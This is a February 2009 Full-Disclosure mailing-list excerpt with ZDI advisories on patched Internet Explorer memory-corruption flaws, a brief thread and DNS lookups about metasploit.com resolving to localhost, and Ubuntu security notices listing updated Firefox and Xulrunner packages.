zdi-disclosures at tippingpoint.com Tue Feb 10 20:56:41 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 10 Feb 2009 14:56:41 -0600 Subject: [Full-disclosure] ZDI-09-011: Microsoft Internet Explorer CFunctionPointer Memory Corruption Vulnerability Message-ID: ZDI-09-011: Microsoft Internet Explorer CFunctionPointer Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-011 February 10, 2009 -- CVE ID: CVE-2009-0075 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6753. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the handling of document objects. When an object is appended and deleted in a specific order memory corruption occurs. Successful exploitation leads to remote compromise of the affected system under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx -- Disclosure Timeline: 2008-09-23 - Vulnerability reported to vendor 2009-02-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Tue Feb 10 20:57:58 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 10 Feb 2009 14:57:58 -0600 Subject: [Full-disclosure] ZDI-09-012: Microsoft Internet Explorer Malformed CSS Memory Corruption Message-ID: ZDI-09-012: Microsoft Internet Explorer Malformed CSS Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-012 February 10, 2009 -- CVE ID: CVE-2009-0076 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6761. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists when processing, in XHTML strict mode, a CSS stylesheet containing a specific combination of style directives one of which must be a 'zoom'. The fault in processing results in a memory corruption vulnerability which can be leveraged to execute arbitrary code under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx -- Disclosure Timeline: 2008-10-15 - Vulnerability reported to vendor 2009-02-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sam Thomas of eshu.co.uk -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From staticrez at gmail.com Tue Feb 10 22:05:34 2009 From: staticrez at gmail.com (sr.) Date: Tue, 10 Feb 2009 17:05:34 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 Message-ID: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> anybody else seeing this? can't get to metasploit because it's currently resolving to 127.0.0.1 sr. From staticrez at gmail.com Tue Feb 10 22:11:47 2009 From: staticrez at gmail.com (sr.) Date: Tue, 10 Feb 2009 17:11:47 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: <1234303788.19641.15.camel@n1-14-96.dhcp.drexel.edu> References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <1234303788.19641.15.camel@n1-14-96.dhcp.drexel.edu> Message-ID: <5d80962a0902101411m378d7465q33a9d3cef1abdc17@mail.gmail.com> thanks, metasploit.org is up. reading the blog now... On Tue, Feb 10, 2009 at 5:09 PM, Harry Hoffman wrote: > yep, > > [hhoffman at localhost ~]$ host metasploit.com > metasploit.com has address 127.0.0.1 > metasploit.com mail is handled by 1 bogus.metasploit.com. > metasploit.com mail is handled by 20 slug.metasploit.com. > metasploit.com mail is handled by 30 core.metasploit.com. > > [hhoffman at localhost ~]$ host -t NS metasploit.com > metasploit.com name server dns02.metasploit.com. > metasploit.com name server dns01.metasploit.com. > > [hhoffman at localhost ~]$ host dns02.metasploit.com > dns02.metasploit.com has address 66.240.213.81 > > [hhoffman at localhost ~]$ host 66.240.213.81 > 81.213.240.66.in-addr.arpa domain name pointer core.metasploit.com. > > > On Tue, 2009-02-10 at 17:05 -0500, sr. wrote: >> anybody else seeing this? >> >> can't get to metasploit because it's currently resolving to 127.0.0.1 >> >> sr. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > From vigilantgregorius at gmail.com Tue Feb 10 22:08:38 2009 From: vigilantgregorius at gmail.com (Miller Grey) Date: Tue, 10 Feb 2009 16:08:38 -0600 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> Message-ID: DDOS On Tue, Feb 10, 2009 at 4:05 PM, sr. wrote: > anybody else seeing this? > > can't get to metasploit because it's currently resolving to 127.0.0.1 > > sr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/683882fe/attachment.html From jamie at canonical.com Wed Feb 11 01:49:31 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Tue, 10 Feb 2009 19:49:31 -0600 Subject: [Full-disclosure] [USN-717-3] Firefox vulnerabilities Message-ID: <20090211014931.GC3543@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-717-3 February 11, 2009 firefox vulnerabilities CVE-2008-5510, CVE-2009-0357 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Kojima Hajime discovered that Firefox did not properly handle an escaped null character. An attacker may be able to exploit this flaw to bypass script sanitization. (CVE-2008-5510) Wladimir Palant discovered that Firefox did not restrict access to cookies in HTTP response headers. If a user were tricked into opening a malicious web page, a remote attacker could view sensitive information. (CVE-2009-0357) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1.diff.gz Size/MD5: 184569 201540f2560ee07d0a7b30d367ce41bd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1.dsc Size/MD5: 1800 e8a6f2726dbc06dade12a0ebc19c7fae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j.orig.tar.gz Size/MD5: 48454140 496d1a74f2a98e8983737a874a9db29f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_all.deb Size/MD5: 53638 9a18c7067527411eababced232354e7c http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_all.deb Size/MD5: 52746 fa9d687831d30b8f8ef39da07c7a1ff4 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 47675616 d3b427dc0d4db0eebb5f3147ce3d29bb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 3045278 1683527a70cdf674f7b711ad559db6b4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 85802 d88ad731cdfc825cb1f88ad91d8fbe2d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 9522850 b6d18064354f4e733894ce40fe048be4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 228116 90343b0a500020dd643c049164ba9c93 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 165590 3c2be076fb6d9c61cb42d938a90b93d2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 254734 4198117776b43f20ca6d70b554b81db7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 826298 b88f70f60cb48caa96add58750e5b4bd http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 218730 e76dcc4583433117dbd7b81a77a858f5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 44222898 8c37f41c90782d6f7a1bef130a33bebc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 3042728 4542d11b7a0d330ba036246b518b7348 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 78320 a09d5ac38d8656b09b02f61de4a3a848 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 8031042 89edcd5c182b752bd4a81d53bb4fcf9c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 226174 0837e3ee67b4f6cde742c775e037f458 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 150976 6405eb0e815c96e8627f2b4d136eff11 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 255144 0e40cab26f0632c3d8687def727799c5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 716692 950b133f03721a6e850c39374211eed9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 212318 32b6d850fe57e89ae8646adb606552df powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 49080148 8c660c35194a0d6ea0eaef04217fabee http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 2858774 459ccaa976dadf0a084d79a749a1117e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 81422 ebce34e5fbdc9f9512eb52ff4722ae5b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 9112744 6b2cda45169a8a9bb7b13afd2698a304 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 222260 6aae274c9ced525cd99cc4995a893118 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 163044 390f958f20ee78f041342d934b67edcd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 247834 3a4363d4e6b72e79826f46013328d975 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 816088 69bf430f8f920576685682d684dd0159 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 215280 33d4ae48f71b7ac9c0b8a3ddaccbe9b9 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 45627582 86289259deef3338488deff398981f8f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 2858786 b846d70d98da5c911c56175900f38561 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 79926 b001d774bd2f4eeba25abe99aaf806f1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 8498570 191dac8aa9174eefd1a0bdfe212b453a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 222282 2dc8e2df944c5d49c4e7a409077eb3ff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 152948 68af6ea71c2386cff897d0862f2025ab http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 247844 243fcbcde87e019f0e81748b9db25014 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 727550 dcb087f639cc1fe8be4fea51c4034d28 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 212730 d74dc227e12ba13b96cb586edefe1c90 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/4627adf9/attachment.bin From jamie at canonical.com Wed Feb 11 01:43:03 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Tue, 10 Feb 2009 19:43:03 -0600 Subject: [Full-disclosure] [USN-717-2] Firefox vulnerabilities Message-ID: <20090211014302.GB3543@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-717-2 February 10, 2009 firefox-3.0 vulnerabilities CVE-2009-0355, CVE-2009-0357 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.10: firefox 2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: A flaw was discovered in the browser engine when restoring closed tabs. If a user were tricked into restoring a tab to a malicious website with form input controls, an attacker could steal local files on the user's system. (CVE-2009-0355) Wladimir Palant discovered that Firefox did not restrict access to cookies in HTTP response headers. If a user were tricked into opening a malicious web page, a remote attacker could view sensitive information. (CVE-2009-0357) Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1.diff.gz Size/MD5: 194096 3b0eb4a53c8a6f101d8e802172b35470 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1.dsc Size/MD5: 2410 1a4f7e3c168867fe00d15a9ab0fddbd0 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly.orig.tar.gz Size/MD5: 37773218 99f6660ed9a5123b99deb71a4e542beb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_all.deb Size/MD5: 201368 31cb5c6d1a08cc7ba16bb639c91a0aaf amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 78163666 58624d232e8d4cfefd8aa0b3930f1645 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 3409228 2c70383c7fdb1c47dff030bcfc19c667 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 98652 96c04d01cb85d0e7bf7f6bd0a462217d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 67370 d7c39e5768ab583dfd378dd8caaec8ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 10514542 e2848c8d832da591ee6738b6c83e46fe i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 77307750 06d768c4f6ff11b0e9a767d9430d1167 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 3389432 6d0f9551aad0bf24730ce9e8bd0e43a8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 91414 0e6b2a8b84b703e83daff329bec2aaa8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 66320 509349c58bd38c4c8d5c3f01c5f854d8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 9263558 5071f73cd799d6be6694ffc325ece112 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 77589024 34b1054c205c40487c6fb63a07b7f8ea http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 3387598 9f72cfde2387f9728124f32e82adab69 http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 92266 b52a5d27e848f2b49642accce30457a1 http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 66600 60206314a39b88285db5ff69efa2079c http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 9116162 08e770ab94d22ad21731033bb9569bc9 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 80783090 7e7d643e7fba65302c52f6c250b826ac http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 3202874 ac1e5d66c385ddc6c52ac47d54408624 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 96388 1d752d1304bae4438e69e7176c853df7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 67654 de86db9d630be0c23ac80d17bdc21552 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 10317856 2b66401173a009cfdc915156c3eafa7c -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/beedea2a/attachment.bin From jamie at canonical.com Wed Feb 11 01:41:21 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Tue, 10 Feb 2009 19:41:21 -0600 Subject: [Full-disclosure] [USN-717-1] Firefox and Xulrunner vulnerabilities Message-ID: <20090211014121.GA3543@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-717-1 February 10, 2009 firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2009-0352, CVE-2009-0353, CVE-2009-0354, CVE-2009-0355, CVE-2009-0357, CVE-2009-0358 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: firefox-3.0 3.0.6+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.6+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser 3.0.6+nobinonly-0ubuntu0.8.10.1 firefox-3.0 3.0.6+nobinonly-0ubuntu0.8.10.1 xulrunner-1.9 1.9.0.6+nobinonly-0ubuntu0.8.10.1 After a standard system upgrade you need to restart Firefox and any applications that use xulrunner, such as Epiphany, to effect the necessary changes. Details follow: Several flaws were discovered in the browser engine. These problems could allow an attacker to crash the browser and possibly execute arbitrary code with user privileges. (CVE-2009-0352, CVE-2009-0353) A flaw was discovered in the JavaScript engine. An attacker could bypass the same-origin policy in Firefox by utilizing a chrome XBL method and execute arbitrary JavaScript within the context of another website. (CVE-2009-0354) A flaw was discovered in the browser engine when restoring closed tabs. If a user were tricked into restoring a tab to a malicious website with form input controls, an attacker could steal local files on the user's system. (CVE-2009-0355) Wladimir Palant discovered that Firefox did not restrict access to cookies in HTTP response headers. If a user were tricked into opening a malicious web page, a remote attacker could view sensitive information. (CVE-2009-0357) Paul Nel discovered that Firefox did not honor certain Cache-Control HTTP directives. A local attacker could exploit this to view private data in improperly cached pages of another user. (CVE-2009-0358) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 105962 9d1dd815f6901881c9d0c7e02ba4a75b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2711 61ba06fa21dae6e6828921f22540d243 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly.orig.tar.gz Size/MD5: 11180629 f7306d068c261f95c284fba5a75a6c71 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 77638 2173124c73ad3095d97bf8960ec855a5 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2776 a3dcb8b8fd26e1d802e9971a46e7e1f3 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly.orig.tar.gz Size/MD5: 41504221 c3b32d6f68af24a75e4c902cb2ddbc09 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65864 9dc2bf09e6fc28741544c4bfc5904738 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65876 8e290cff0732bac4b1ce1728b06f028b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65840 30c689f5ecf7ec430353d713057cd971 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65818 0cdaaf28707b274a5f73a54d8b1fa965 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65978 f962ffb3ed9dd6573956304e7cf1a4df http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65890 322b798cd164a5ce68de2866e1dc1162 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65836 0a000e41e94f5e60a83ded055748296a http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8968 61ba17d1e482222ac49f5f5a7d5d3913 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8964 2ad2759d85a104116cb36831b028ce07 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65870 aac931ab3ca46e329a4955a5bf6e76a3 